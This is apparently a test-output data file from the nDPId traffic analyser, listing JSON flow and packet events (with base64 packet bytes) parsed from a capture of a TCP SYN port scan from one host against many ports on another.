-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAszJQAADoGQd6sEAAIQA2GNIzSAAbdUoMYAAAAAGACDAAsiQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsqb4AACYGeLSsEAAIQA2GNIzSBYndUoMYAAAAAGACDAAnBgAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsNw4AADUG3GSsEAAIQA2GNIzSIB7dUoMYAAAAAGACCAAQcQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsOZAAACUG6eKsEAAIQA2GNIzSAqvdUoMYAAAAAGACCAAt5AAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsX3cAADcGsfusEAAIQA2GNIzSC+rdUoMYAAAAAGACEAAcpQAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsRPgAADsGyHqsEAAIQA2GNIzTAiTdU4MZAAAAAGACEAAmaAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsCYQAACgGFu+sEAAIQA2GNIzTIrjdU4MZAAAAAGACBAAR1AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsS98AACoG0pOsEAAIQA2GNIzTAIfdU4MZAAAAAGACDAAsBQAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsHuAAADcG8pKsEAAIQA2GNIzTAirdU4MZAAAAAGACEAAmYgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsiYkAADgGhumsEAAIQA2GNIzTAQDdU4MZAAAAAGACBAAzjAAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsvMkAADoGUamsEAAIQA2GNIzTAb3dU4MZAAAAAGACDAAqzwAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsDW0AACkGEgasEAAIQA2GNIzTBrjdU4MZAAAAAGACCAAp1AAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAs+D0AACgGKDWsEAAIQA2GNIzTH5DdU4MZAAAAAGACBAAU\/AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAscb8AACUGsbOsEAAIQA2GNIzTAG7dU4MZAAAAAGACCAAwHgAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAs2D8AAC8GQTOsEAAIQA2GNIzTA+HdU4MZAAAAAGACEAAkqwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsFp8AAC8GAtSsEAAIQA2GNIzTBrvdU4MZAAAAAGACEAAh0QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAs2rAAAC0GQMKsEAAIQA2GNIzTC+rdU4MZAAAAAGACCAAkogAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAs6RgAADsGJFqsEAAIQA2GNIzTAqvdU4MZAAAAAGACEAAl4QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsrkMAACgGci+sEAAIQA2GNIzTIB7dU4MZAAAAAGACBAAUbgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsq3MAACYGdv+sEAAIQA2GNIzTBYndU4MZAAAAAGACDAAnAwAAAgQFtA=="} 
-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsZBoAADAGtFisEAAIQA2GNIzTAAbdU4MZAAAAAGACBAA0hgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsIdMAACkG\/Z+sEAAIQA2GNIzTB+7dU4MZAAAAAGACCAAongAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsMZYAADEG5dysEAAIQA2GNIzTBNHdU4MZAAAAAGACCAAruwAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsFYYAADEGAe2sEAAIQA2GNIzTBpfdU4MZAAAAAGACCAAp9QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsCKYAADsGBM2sEAAIQA2GNIzTF3DdU4MZAAAAAGACEAARHAAAAgQFtA=="} 